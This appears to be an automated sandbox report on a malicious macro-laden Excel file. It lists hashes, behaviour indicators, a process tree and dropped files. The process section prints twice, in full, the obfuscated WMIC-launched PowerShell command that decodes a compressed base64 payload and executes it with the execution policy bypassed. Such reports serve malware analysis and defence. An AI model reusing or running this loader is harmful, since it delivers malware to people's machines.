analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

sample2.XLS

Full analysis: https://app.any.run/tasks/ba82eb63-55c8-47d1-976f-a40e6a9c7456
Verdict: Malicious activity
Analysis date: July 17, 2019, 08:09:16
OS: Windows 10 Professional (build: 16299, 32 bit)
Tags:
macros
macros-on-open
maldoc-5
Indicators:
MIME: application/vnd.ms-excel
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: autore, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:19:34 2015, Last Saved Time/Date: Tue Jul 16 12:19:40 2019, Security: 0
MD5:

9582B06BFF0F2B43D6693150FCB49C6A

SHA1:

2A90CA7964576B9210C8F35234214F32B412684E

SHA256:

1145EEE29B0805AFBB9CF03FA578CF79A1F94C43125AE6F3D2867810248FB555

SSDEEP:

3072:PjvlYkRIPPm3eNCZmbpoahZhC0cixIiG0iIFLR8m9xe0VukmBj:rvlYkRIPPm3eNCZmbpoahZhC0cixIiGb

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Scans artifacts that could help determine the target

      • EXCEL.EXE (PID: 3584)

  • SUSPICIOUS

    • Reads Environment values

      • powErsHell.exe (PID: 300)

    • Creates files in the user directory

      • rundll32.exe (PID: 2716)

    • Executed via WMI

      • powErsHell.exe (PID: 300)
      • wMIc.exe (PID: 2288)

    • PowerShell script executed

      • powErsHell.exe (PID: 300)

    • Uses RUNDLL32.EXE to load library

      • powErsHell.exe (PID: 300)
      • rundll32.exe (PID: 2716)

    • Application launched itself

      • rundll32.exe (PID: 2716)

  • INFO

    • Reads the software policy settings

      • powErsHell.exe (PID: 300)

    • Creates files in the user directory

      • EXCEL.EXE (PID: 3584)

    • Reads Microsoft Office registry keys

      • EXCEL.EXE (PID: 3584)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.xls | Microsoft Excel sheet (78.9)

EXIF

FlashPix

CompObjUserType: (Foglio di lavoro di Microsoft Excel 2019
CompObjUserTypeLen: 42
HeadingPairs:
  • Fogli di lavoro
  • 1
TitleOfParts: 20190716-83748
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
Company: -
CodePage: Windows Latin 1 (Western European)
Security: None
ModifyDate: 2019:07:16 11:19:40
CreateDate: 2015:06:05 18:19:34
Software: Microsoft Excel
Author: autore
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
56
Monitored processes
8
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start excel.exe wmic.exe no specs conhost.exe powershell.exe conhost.exe rundll32.exe no specs rundll32.exe no specs rundll32.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3584"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\admin\Desktop\sample2.XLS"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Exit code:
0
Version:
16.0.11328.20158
2288wMIc 'prOcess' "cALl" crEAtE "powErsHell -NoNiNtErAC -NoPrOFi -WIn 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001 -EXECUtIoNpOLiC BYpAsS "\"`$kI="\" + ([ChAR]34).ToSTRing() + "\"MU(YY io.STreAMReadeR((YY IO.MicrosoftSiON.deFlaTestReAm([Io.MemOrYstReAM][CoNveRT]::FROMBaSe64STRInG('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' ) "\" +([Char]44).ToStriNg() +"\" [Io.MicrosoftSiON.MicrosoftsionMODE]::DEMicrosoftS ) ) "\" +([Char]44).ToStriNg() +"\"[TEXt.enCODIng]::aSCii)).READtoeNd()"\" + ([ChAR]34).ToSTRing() + "\".replace('Microsoft'"\" +([Char]44).ToStriNg() +"\"'compres');&('sa'+'l') ('YY') ('nEw-'+'OBjEc'+'T');&('s'+'al') ('MU') ('ie'+'X');MU(`$ki)"\"|& ( $SHeLLid[1]+$shellId[13]+'X')"C:\WINDOWS\system32\wbem\wMIc.exeWmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
WMI Commandline Utility
Exit code:
0
Version:
10.0.16299.15 (WinBuild.160101.0800)
1884\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\WINDOWS\system32\conhost.exe
wMIc.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.16299.15 (WinBuild.160101.0800)
300powErsHell -NoNiNtErAC -NoPrOFi -WIn 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001 -EXECUtIoNpOLiC BYpAsS "\"`$kI="\" + ([ChAR]34).ToSTRing() + "\"MU(YY io.STreAMReadeR((YY IO.MicrosoftSiON.deFlaTestReAm([Io.MemOrYstReAM][CoNveRT]::FROMBaSe64STRInG('ZVjHsttIlv0VLSZGUkEtkLBETfQCJLz3TlELEJbw3lX0vzegmEVPzItgAu/eRJprzj2Z//3l27ds+fL1j5oa/vj6/WdD1skv+Mf9/gP66x9C+2m+fv1+dvkK33n5K/D173z+1z+/kZT29/1ff99Owb/O9y//SAV6g5mz+XH+bptwKujt+9n+z89v3xZy+IRvif5y6v6QKeOP83lOFP6fifjmlF6KL998/8un/Wla5+cDTcpDQlKJ8e0Sj6fIP3+jldQ/+fOl/RmpsmYko8m3zU+KZqrwlFq0ORl0KH/78uscSE5qdfBNa0jC+q8vv15q49CG9defZ8c/GUOtn6RJY8g4GXyTfTtXYAVV/gFwPvI9cB+eY83NShCbkwN0c1YyBjnWnvsyMtrYL4uMN0NEBhLZEzTmu9eSNnPSHbpE+mBzLJMIx46Doit2T5eJCBYQTIcB5JdHhYMYIcNOisPmHQKwFD4HW8DHezmfsIejIAjiKB5rOA7jt/sRP9Y4BgjMw2sAADjuAKdHiqNwMQFJr+DnXzOCRZ7GICCAIEFgDgLOMIHCSwoWnYXhABg8UZBYhh0Hzyke9zhOU2BPljtOHQf3mOEx0sAn6J3drw6Le7XpMljMHUcAggCSeQEi8Fpn8T4wAsXo960bME1TDmquxD5GOtRyHTXxPHcZiy5OwjID7tLsPjoUaYBm2FFGwJe8xxwZs3Pcu0fQ3eOC0O4wTH7egOPN3E0PDExiCuAjdJJgw1xIctMdN730c84MWvYYxttxviZA46goRlgO2LwDghODEeycpc1zabkHwoI6yoJgcKgSRDcsTv/IY3PDRjUKewCtYPIjGiFqSyN2jI/cpaHInx8+m74XaReWYeYJ7+1PTcrj8vCRg5r/7I9uqZJ3esCsd3k+lR86YFIws0fpravSYBsRfMzeb/bUvugbCseLdr4+67NRHMpKxGAT9830fB2Bqpa7H0RvrQJ2quOKMMN8gxZ2STvLjCUuuYMDL6rJ3UKIRAqOAxgFB7lc8sLv8hTU50acWBOX4iiCB5bVCopH/sOLYOLs5GFBTlRzOO1WIdgbhsgJdGdVgW6WcY6ifsI1LnXHhdZ3e6N9oTOdvbhGt8sIauRpZXP+7SiCVRz8OMfgMEshce9n49Zg8XvkMj7t93tDz8m1IpYm7M8y4zd+GqjVKw0fWu4ZIrtV+Xzp+1KiSH1/8JIS4dXZH1L9GpkuH0Z6DgRN/Wbdp4e2Lj+nMZK8eRfSXyxZQJX6JmOH+BCgeHbGPhNwPkgb1qRXqqxoio0h3Bn5ZV4Wy0Znv3O7/QncRaf5vFOZVn9Em674qBJcuIG2Bzra0wVPZu+QL5SNz9eOF6TzUY6zuj4EPCW8yOj3FT4ExkCafoOqnvXBAemURz/7gx1hIXoZyjbONt/ORiw7qxbupUd6Prk6l5xSKistWc3QHJjVqEmgW3LuxOflGoqyQzpR1FAH7RFynGqulzYjzpj1LGCXSVIkergKRzqw99f5ge6eTdDLr77tSmbIXICvsJF2aXA2FIWT6IgzxidDOBZDQs3HIVM95o3LVEKmVQCdfgR2SVY/jHvNOaXEhLoIXWmfhwW8s+TVctMFOh1jZTdxZfDarMtmj2iWBMYw+YB6BgRzk1yrkEsX05TXSo4vcw+0wXtdML0KVVcTkNvWBmWIHY3SV1cqNV+RPdjGnCdMFYxJWM3JBZmSHudZEQ3mxt9fZuBm5XScq/h0Dod26k5oh7GbFGasvX3tvt5Z2x7LdOWYnO3xWcrI4JSHS0c3YXRoJiyazzwnnqFb+5SOPRF7aXoEZRiakXayJq1gl5RMynGMMgVM7sTwBMd+eTH2OhqG/qGpc7h9AXHm9vlAQOKgH2tuPdPs4PXpU8DNcIZgje9B//qdquVwJUpnNpajXpEDkDIo9m1cUy6ZvVj9FKlbQAkQDR3IzJgoUFwyjrqLryAUkryMqz5HpNmLb0B0aUjh0Vq9mW7l+V+W4HUJXRHpRK8856nRPQBFfGfiPLS7bD913xQuC8giaBbR6yUi9zy6HVBCFvtqxYn4uYZpbuUwkbVS6kqWkMj8KYeSee9kEMxI8Jk/+LYn+31hMUl4YqqoQTwrrI5pPvfgpXCijSYfAnsyk+VBy+eC3uf+VFbtyaUmJzj0x4ExM1TbamYO1INIc87dWQroj15cVdrYaZF0tFAXBuJtDFTOndKJ0kS7eNhv/AxtA9lbWW9xmIQtVCok3uSKjPwoz+5GtwKP0zF4AdkYea7sdaa9jD51x+oV7EU3fwZ2Itkszu937E47yeM1DfQMWLJS4ufS/A9/tOXSnt8bIq1eXlsVA0mcaRbQu2wOh6QK0vvChMcnmPLmcmPtv5MmXJXEqt9DwF3sBqfXMhG4wArlkMCKajaeQTzUWHbM8jOtcb8hZdptYwiSC8+l8wm562WTaaRK9eJuTHX7qdzEnwvo4Gx+223clzKzAWDmFbzIuYaCvtF7YDt2vvXPwLjKivuq6YWgEYJG0eRhDC+jDxJRfbnx70ihpSKXyKJlO9dB+1QI7YhvSb4Hxv1RMnfQaV6Hjw1maBKuS1iNEQTcC9GVYE5udjzYCay/b2/h3j8Bni1vjsMWkEPldO1/lI8FfOrC2TN14G8i7tYGaj4u17uodKH149bNXAemb0ibCN3O5wvOsGYY72/f//QnanGn3bZuWgFw6WCg6Ju0a2o0a8B39nnBMx8r7dMeLmur+ZXcpp4SWBi667sK+/rVlE0LV+ap6EHhznmmZ5XNxfMcf5vIRK1eNhrFEaJZJk7WAuRw7uv2uHwnB4Mwq/5qmS8RDtEplFqkBjBTzR4r3Z18o6T8iENguriCwmPKxTmy8OIybBp24itrny2Wr72E17sTnxxRBPvn8dsdxsrSEZhde72HF9wbTSTV4Yc7ikWi4fWUXHjwMPtZ94eKtLX4moOAGq0lybvGLFPVozmwMtLl37YVbs+J20TLEcVxQkRD1XGpjR+ZZvW2R7ofgrwmYclwJHDXj60rTDV9Lm83Z+yNEFFhiuic9qHI80Tu+SiJITTieR92XFvOiYUAyc282+lY3GReVTNI4kxGRJjpYnVKD+dlxq1CFLfeUrW3KN5wNnpcWettzHZAtp1OV1Wn2liJMB3GwOTGvEI32IvoPR7bQef33Gr4pSMM9FZLz08+9OjIKCqTieOAIkENJQpPOUct4OSbQxkAV8KZcGpfGAC+1Y3LY4RACTyr3WD7nlSFLta2cqvyF9vI3E3wY0O05xUt9MeY2dH7WnlfMmg4+d2FfHty0CyDoCXf0/XtrHsMVyRS+TBQ6KQivBNwAnKMbx1pbvrrclBMU+5WbCZLxW+DXMb7uPsqNQJV37x2WtkIEe4iJjQYK7SCFlkNig31M5/F9g7LcN5l+7PDac9oJ2wfKU3r6th2izc8pqAB6Dk7ZIR/06+IXtZnNQE2r1xOS23bChvHeY/O0xFuRP+5eVVcXeAeyde6As/r2meNL57anDkZPaEVLct8wxOwu4kKT2MzbFC+M8J8ty+3oe4lizt1BDcwQxtUqAk9r4NQxTBVB5UHbRuy38zpUabwwSasfnH40qf5LUUh6pkhV/xS7DPkeJrrtUR2Gn3c95Kq5oxW9Nwjnim6v5O+YKQnL8UF87jYjPtUKwSw/SIWi8y3Gjh6Hbav32BpZO50JMelaAcfUTrt82TDdePi/dCHrKBUXf1AVYAc/kUJuq7hr+Sm4mfCor2hP9ptkrBX6IkyFEmGasPhFfubrxXQUuf0JLdb/nq18nDbToqp0FaZuczxlO0cq1tdphAEcatWva0vtxGD214R1PPdNO4mJBP9SNM+fbcAx2O3KyOD12+cd1ozhFDnsx1VRPhEhthX7GOy4xlCLEShvOU2NuxBFoa1aRnCKu5XfgM89bkL6ZZNuGG75YhK1MNBzMEmJIrX5Nk0JqFgoeW5xcATO+4Pkctvnjsi2IcnjBtWVYriE8zFVbU85pZxLzQMes7YzHmCaTvlmycGxt/ocqXlA3zr3XqePrykxLy+Rh8nSYVioVR3kvVgml3rEXpguffwU9Vcq4LO/AOLbnDXZsdyE4ZwPbLG5WRNILFQE3bQ87enlVcRFRkigGssKyQ6JdraAIQVpyjxy1Tfi/qgmBV7l2jCnKnViGy57ZG+HfOhZa4xoxtgcacFrhOqz9oo2xiCgWgfsTXERO3i4b3a1ChUbSaN/MuaxvQYU/U6tR2fi+eImzIQWKp0bcz0IjQuIn98uKYjqMhBMl8rW07crYE1IxkCcX0P78enL+scZOzlZhh3ifSUF1f7FwQUzUch3d1VX+SVSBzv8698LiXmHOHSb/PAHfxd8hQo70CjDmQB15K4eH7Y7YLyFYuEZJmetiRfNMMkFhlbL3Z6DB12W5/ZfWxzZ6yNN52EojqjSVAVvZQhD7xg9mtTu7xL5V1Qmm7yTUbFokn6PG9C/DqGokJMGEUY7Tz44G9a9Wq+4iYmPzhdLsZsSFiqkwoRuy40XAuO/FBVmiIJit4n96zoZiy8Anbkmfg8KRZMS90sMjEDqZ0W+8JmRY5lzliRdgskss+7ydJdSveeD0EIp5qgag9b9YF9qJu97mSBBT4ped21uwnItwO0lI/86aY+gXK4uF8GzKIDEWGK9WUCMvO3yyQNW9OPG9O7Mxn6fmG9YOjT1TS5Vs0olaHrYW48xigbqXiP8VjQGYlW4JYQX1Uun1DSSuUotClqmo41VJlUD1L5qXpnCEixy9wJdpMogQtZXXPEBNSoMKL09HGTAdLiSFg2pMrFAfVhTvl2y7HoIrV8TlVNmbeZfgjwiN4jVwePTnjJ2ENl0xOjr9Cka3KVOOVinLLgbpoAl5jeXEXnZut9JEryRky+7fP6ph9gMX9ETbZmCX4XpK/s6jujU7OOYjVO56v08hqvDpohx+buEBu3F7yzcBa0Ue8iAzquxEhNFfkLIrDWpB4L5ngbCIFD5c9P7MGET+HASBQWsGEr3WE/5osf69Po+4vTugSyWiEYJ3D0zkofkua8OeLqaI27hzU08SD2ax/J6u0dz/KKpqcMqC9v1OoSj35DwttNgVw++ZWUVJk1BYij02oPEZ/uugq7yW3HxE/RxIslAmQWMPFedO7849VxpMw3LdYNpYIJVbQqB1n1g5c0dMgFrrxcp+poyCd/R9ohEuCjnnscIui5U9HWBuYrdp0H7co1t62kVst2N3mgM7Hz6mDyrT0x5tk7vOUkNJLgUT4g9lNl1A/2oq6j6VWY8IngniQctS3BnKirqzpRWAr58EP63Ycpp80FiG/xrq4WmykuRr3JKuEcWJtHRYB3k79Kn+dZk8SwRAG0EqMKvCjH1gyAwMKCCwgW1Y1YcCAGJE+92B6XLAS4XJxyOiACfHghAaZKChJ3+OyMW1dpBlNwZicXRDsw4d6nuMNT7e3ACABuj3/+vqT88cvczYmuf/Ltz7M8aUZijnyrXNeR3fD7OlKRWyr5688/KTo69QNtmt+///jyy6K36WeiRGrMN+xf52R//kmOEc9///5zoEnKUhMl/vbl+9fvPw1ak8gX/b9Xrz++/td/ys5FfP3xa7SMzznKrxcXDn/BxH/oSUr7f3rk+/cv/wY=' ) "\" +([Char]44).ToStriNg() +"\" [Io.MicrosoftSiON.MicrosoftsionMODE]::DEMicrosoftS ) ) "\" +([Char]44).ToStriNg() +"\"[TEXt.enCODIng]::aSCii)).READtoeNd()"\" + ([ChAR]34).ToSTRing() + "\".replace('Microsoft'"\" +([Char]44).ToStriNg() +"\"'compres');&('sa'+'l') ('YY') ('nEw-'+'OBjEc'+'T');&('s'+'al') ('MU') ('ie'+'X');MU(`$ki)"\"|& ( $SHeLLid[1]+$shellId[13]+'X')C:\WINDOWS\System32\WindowsPowerShell\v1.0\powErsHell.exe
WmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.16299.15 (WinBuild.160101.0800)
2932\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\WINDOWS\system32\conhost.exe
powErsHell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.16299.15 (WinBuild.160101.0800)
2716"C:\WINDOWS\system32\rundll32.exe" InetCpl.cpl,ClearMyTracksByProcess 260C:\WINDOWS\system32\rundll32.exepowErsHell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows host process (Rundll32)
Exit code:
0
Version:
10.0.16299.15 (WinBuild.160101.0800)
876C:\WINDOWS\system32\rundll32.exe C:\WINDOWS\system32\inetcpl.cpl,ClearMyTracksByProcess Flags:260 WinX:0 WinY:0 IEFrame:00000000C:\WINDOWS\system32\rundll32.exerundll32.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Windows host process (Rundll32)
Exit code:
0
Version:
10.0.16299.15 (WinBuild.160101.0800)
2816"C:\WINDOWS\system32\rundll32.exe" /s DllRegisterServerC:\WINDOWS\system32\rundll32.exepowErsHell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows host process (Rundll32)
Exit code:
0
Version:
10.0.16299.15 (WinBuild.160101.0800)
Total events
2 106
Read events
1 831
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
4
Text files
5
Unknown types
5

Dropped files

PID
Process
Filename
Type
3584EXCEL.EXEC:\Users\admin\AppData\Local\Temp\~DFBAB28A1EBD66D486.TMP
MD5:
SHA256:
3584EXCEL.EXEC:\Users\admin\AppData\Local\Temp\~DF9F7FAD2EFEC7CF08.TMP
MD5:
SHA256:
3584EXCEL.EXEC:\Users\admin\AppData\Local\Temp\~DFFBDD964F06772CA5.TMP
MD5:
SHA256:
300powErsHell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_ryg14jvq.1os.ps1
MD5:
SHA256:
300powErsHell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_hzemd0xy.re1.psm1
MD5:
SHA256:
3584EXCEL.EXEC:\Users\admin\AppData\Local\Temp\~DFC14294E119C60A57.TMP
MD5:
SHA256:
